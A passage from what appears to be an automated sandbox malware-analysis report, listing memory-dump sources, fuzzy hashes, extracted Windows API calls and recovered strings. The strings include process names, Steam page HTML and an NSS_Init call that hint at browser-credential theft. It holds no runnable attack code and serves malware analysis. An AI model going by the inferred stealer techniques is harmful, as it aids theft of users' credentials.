                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3192549508-0
                                                                                                                                                                                          • Opcode ID: 70cfd4dbb5b7f8460ed62b895e0b9472899e09c8109e35db59d7307d9af0016b
                                                                                                                                                                                          • Instruction ID: 20ff2e28d3fba437fd0b7921caa024c743b3284442455d0507a268f649e7047a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 70cfd4dbb5b7f8460ed62b895e0b9472899e09c8109e35db59d7307d9af0016b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 789002E0259B4046D70117715C0D40A35A46B48707B410460A105CC054DBD48104591A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: cf35575b0707f82590b9855ed0d51859fbcef61116281b097c1a543cd8bd0fa3
                                                                                                                                                                                          • Instruction ID: 43b0cb8954ac201a961623fa799cb0f151b290ea7a8ecb37256065a8e2414ff9
                                                                                                                                                                                          • Opcode Fuzzy Hash: cf35575b0707f82590b9855ed0d51859fbcef61116281b097c1a543cd8bd0fa3
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6D02A7B3D496F24B8BB14EB944906267FE16F0275031F46FADDD03F1A6C212ED0696E8
Memory Dump Source
• Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: f8d911352b7be11e8ef3f8d43dc69cd37138e10f06c97852b63a715cd4b250d5
                                                                                                                                                                                          • Instruction ID: d256f1c99479b207678580fcb63197705f640815169115519c5f26934de16b0c
                                                                                                                                                                                          • Opcode Fuzzy Hash: f8d911352b7be11e8ef3f8d43dc69cd37138e10f06c97852b63a715cd4b250d5
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1AE06C78A61648EFC740CF48C185E49B3F8FB09768F118095E905DB321C378EE00EB50
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 35f880b7d9409492cfbd2c31b6ba08b67b52b83fed8c053745051b7244bb587c
                                                                                                                                                                                          • Instruction ID: 81b03007a1f881deed44a42fc0175a6fbd256bce6d09bf2effb1e14420dd7128
                                                                                                                                                                                          • Opcode Fuzzy Hash: 35f880b7d9409492cfbd2c31b6ba08b67b52b83fed8c053745051b7244bb587c
                                                                                                                                                                                          • Instruction Fuzzy Hash: DEE04278A55644DFC741CF58D195E99B7F0EB09368F158199E806DB761C274EE00DF00
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: f1937a1b08348a57b00ab59f39d03f042d4a1f0e171b8ae631e82396fa0be247
                                                                                                                                                                                          • Instruction ID: 6edc1f77bc014f77afb1dd4525fcd7db61d9a3eb149a076bd6fc7a55924a73f3
                                                                                                                                                                                          • Opcode Fuzzy Hash: f1937a1b08348a57b00ab59f39d03f042d4a1f0e171b8ae631e82396fa0be247
                                                                                                                                                                                          • Instruction Fuzzy Hash: D9C08C72529208EFD70DCB84D613F5AB3FCE704758F10409CE00293780C67DAB00CA58
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 17de449bc8e75433a69f048acdc393cdc02c9d7c97a966a586413745d476a19c
                                                                                                                                                                                          • Instruction ID: 5941d710df6caaa93d6ffa2de60dce8e613dec4f923ccdd24a2439a3e016513d
                                                                                                                                                                                          • Opcode Fuzzy Hash: 17de449bc8e75433a69f048acdc393cdc02c9d7c97a966a586413745d476a19c
                                                                                                                                                                                          • Instruction Fuzzy Hash: DAA002315569D48ECE53D7158260F207BB8A741A41F0504D1E491C6863C11CDA50D950
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0002DB7F: lstrlenA.KERNEL32(?,750A5460,?,00000000), ref: 0002DBBB
                                                                                                                                                                                            • Part of subcall function 0002DB7F: strchr.MSVCRT ref: 0002DBCD
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,750A5460,?,00000000), ref: 0002DD04
                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 0002DD0B
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 0002DD20
                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 0002DD27
                                                                                                                                                                                          • strcpy_s.MSVCRT ref: 0002DD43
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 0002DD55
                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 0002DD62
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0002DD93
                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 0002DD9A
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,?), ref: 0002DDA1
                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 0002DDA8
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 0002DDBD
                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 0002DDC4
                                                                                                                                                                                          • strcpy_s.MSVCRT ref: 0002DDDA
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 0002DDEC
                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 0002DDF3
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0002DE11
                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 0002DE18
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,?), ref: 0002DE1F
                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 0002DE26
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 0002DE3B
                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 0002DE42
                                                                                                                                                                                          • strcpy_s.MSVCRT ref: 0002DE52
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 0002DE64
                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 0002DE6B
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0002DE93
                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 0002DE9A
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,?), ref: 0002DEA1
                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 0002DEA8
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 0002DEC3
                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 0002DECA
                                                                                                                                                                                          • strcpy_s.MSVCRT ref: 0002DEDD
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 0002DEEF
                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 0002DEF6
                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 0002DEFF
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000000), ref: 0002DF15
                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 0002DF1C
                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 0002DF34
                                                                                                                                                                                            • Part of subcall function 0002F128: std::_Xinvalid_argument.LIBCPMT ref: 0002F13E
                                                                                                                                                                                          • strcpy_s.MSVCRT ref: 0002DF75
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?,00000001,00000001), ref: 0002DF9B
                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 0002DFA8
                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 0002DFAD
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000001), ref: 0002DFBC
                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 0002DFC3
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 0002DFD7
                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 0002DFDE
                                                                                                                                                                                          • strcpy_s.MSVCRT ref: 0002DFEC
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 0002DFF9
                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 0002E000
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 0002E035
                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 0002E03C
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,?), ref: 0002E043
                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 0002E04A
                                                                                                                                                                                          • strcpy_s.MSVCRT ref: 0002E065
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 0002E077
                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 0002E07E
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 0002E122
                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 0002E129
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 0002E173
                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 0002E17A
                                                                                                                                                                                            • Part of subcall function 0002DB7F: strchr.MSVCRT ref: 0002DBF2
                                                                                                                                                                                            • Part of subcall function 0002DB7F: lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0002DCF7), ref: 0002DC14
                                                                                                                                                                                            • Part of subcall function 0002DB7F: GetProcessHeap.KERNEL32(00000008,-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0002DC21
                                                                                                                                                                                            • Part of subcall function 0002DB7F: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0002DCF7), ref: 0002DC28
                                                                                                                                                                                            • Part of subcall function 0002DB7F: strcpy_s.MSVCRT ref: 0002DC6F
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Heap$Process$Free$Allocstrcpy_s$lstrlen$strchr$Xinvalid_argumentstd::_
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 838878465-0
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,default,?,6C42582D), ref: 6C45CC27
                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,java,?,?,?,6C42582D), ref: 6C45CC3D
                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,6C48FE98,?,?,?,?,?,6C42582D), ref: 6C45CC56
                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,leaf,?,?,?,?,?,?,?,6C42582D), ref: 6C45CC6C
                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,mainthreadio,?,?,?,?,?,?,?,?,?,6C42582D), ref: 6C45CC82
                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileio,?,?,?,?,?,?,?,?,?,?,?,6C42582D), ref: 6C45CC98
                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileioall,?,?,?,?,?,?,?,?,?,?,?,?,?,6C42582D), ref: 6C45CCAE
                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,noiostacks), ref: 6C45CCC4
                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,screenshots), ref: 6C45CCDA
                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,seqstyle), ref: 6C45CCEC
                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,stackwalk), ref: 6C45CCFE
                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,jsallocations), ref: 6C45CD14
                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nostacksampling), ref: 6C45CD82
                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,preferencereads), ref: 6C45CD98
                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nativeallocations), ref: 6C45CDAE
                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ipcmessages), ref: 6C45CDC4
                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,audiocallbacktracing), ref: 6C45CDDA
                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpu), ref: 6C45CDF0
                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,notimerresolutionchange), ref: 6C45CE06
                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpuallthreads), ref: 6C45CE1C
                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,samplingallthreads), ref: 6C45CE32
                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,markersallthreads), ref: 6C45CE48
                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,unregisteredthreads), ref: 6C45CE5E
                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,processcpu), ref: 6C45CE74
                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,power), ref: 6C45CE8A
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • nativeallocations, xrefs: 6C45CDA8
                                                                                                                                                                                          • .exesvchost.exesvchost.exesvchost.exesvchost.exeOfficeClickToRun.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesihost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exectfmon., xrefs: 6C45CF1D
                                                                                                                                                                                          • ipcmessages, xrefs: 6C45CDBE
                                                                                                                                                                                          • java, xrefs: 6C45CC37
                                                                                                                                                                                          • stackwalk, xrefs: 6C45CCF8
                                                                                                                                                                                          • fileioall, xrefs: 6C45CCA8
                                                                                                                                                                                          • preferencereads, xrefs: 6C45CD92
                                                                                                                                                                                          • noiostacks, xrefs: 6C45CCBE
                                                                                                                                                                                          • samplingallthreads, xrefs: 6C45CE2C
                                                                                                                                                                                          • seqstyle, xrefs: 6C45CCE6
                                                                                                                                                                                          • cpuallthreads, xrefs: 6C45CE16
                                                                                                                                                                                          • notimerresolutionchange, xrefs: 6C45CE00
                                                                                                                                                                                          • .exesvchost.exesvchost.exesvchost.exesvchost.exeOfficeClickToRun.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesihost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exectfmon., xrefs: 6C45CF31
                                                                                                                                                                                          • mainthreadio, xrefs: 6C45CC7C
                                                                                                                                                                                          • fileio, xrefs: 6C45CC92
                                                                                                                                                                                          • Unrecognized feature "%s"., xrefs: 6C45CEA0
                                                                                                                                                                                          • audiocallbacktracing, xrefs: 6C45CDD4
                                                                                                                                                                                          • m" href="https://store.steampowered.com/">Home</a><a class="submenuitem" href="https://store.steampowered.com/explore/">Discovery Queue</a><a class="submenuitem" href="https://steamcommunity, xrefs: 6C45CF27
                                                                                                                                                                                          • default, xrefs: 6C45CC21
                                                                                                                                                                                          • nostacksampling, xrefs: 6C45CD7C
                                                                                                                                                                                          • power, xrefs: 6C45CE84
                                                                                                                                                                                          • jsallocations, xrefs: 6C45CD0E
                                                                                                                                                                                          • markersallthreads, xrefs: 6C45CE42
                                                                                                                                                                                          • processcpu, xrefs: 6C45CE6E
                                                                                                                                                                                          • leaf, xrefs: 6C45CC66
                                                                                                                                                                                          • unregisteredthreads, xrefs: 6C45CE58
                                                                                                                                                                                          • screenshots, xrefs: 6C45CCD4
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704117784.000000006C410000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2704193891.000000006C48D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2704222004.000000006C49E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2704248452.000000006C4A2000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c410000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: strcmp
                                                                                                                                                                                          • String ID: Unrecognized feature "%s".$.exesvchost.exesvchost.exesvchost.exesvchost.exeOfficeClickToRun.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesihost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exectfmon.$.exesvchost.exesvchost.exesvchost.exesvchost.exeOfficeClickToRun.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesihost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exectfmon.$audiocallbacktracing$cpuallthreads$default$fileio$fileioall$ipcmessages$java$jsallocations$leaf$m" href="https://store.steampowered.com/">Home</a><a class="submenuitem" href="https://store.steampowered.com/explore/">Discovery Queue</a><a class="submenuitem" href="https://steamcommunity$mainthreadio$markersallthreads$nativeallocations$noiostacks$nostacksampling$notimerresolutionchange$power$preferencereads$processcpu$samplingallthreads$screenshots$seqstyle$stackwalk$unregisteredthreads
                                                                                                                                                                                          • API String ID: 1004003707-3402890661
                                                                                                                                                                                          • Opcode ID: 94d1a0babc6a06f6c53ab820ccb9281870574902e366d329e40fb13443cc87fa
                                                                                                                                                                                          • Instruction ID: cbbd1f80542ab1c7e94387839a97299f127c794a447026a50d97f50e8825e4eb
                                                                                                                                                                                          • Opcode Fuzzy Hash: 94d1a0babc6a06f6c53ab820ccb9281870574902e366d329e40fb13443cc87fa
                                                                                                                                                                                          • Instruction Fuzzy Hash: 965177C1A4736551FA00F1296D11FAE3449EB5A24BF90453AEE0AE1F80FB09D62F85F7
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • NSS_Init.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0002B824), ref: 0002A922
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000375E9,000566DA), ref: 000305F5
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcatA.KERNEL32(?,?), ref: 000305FF
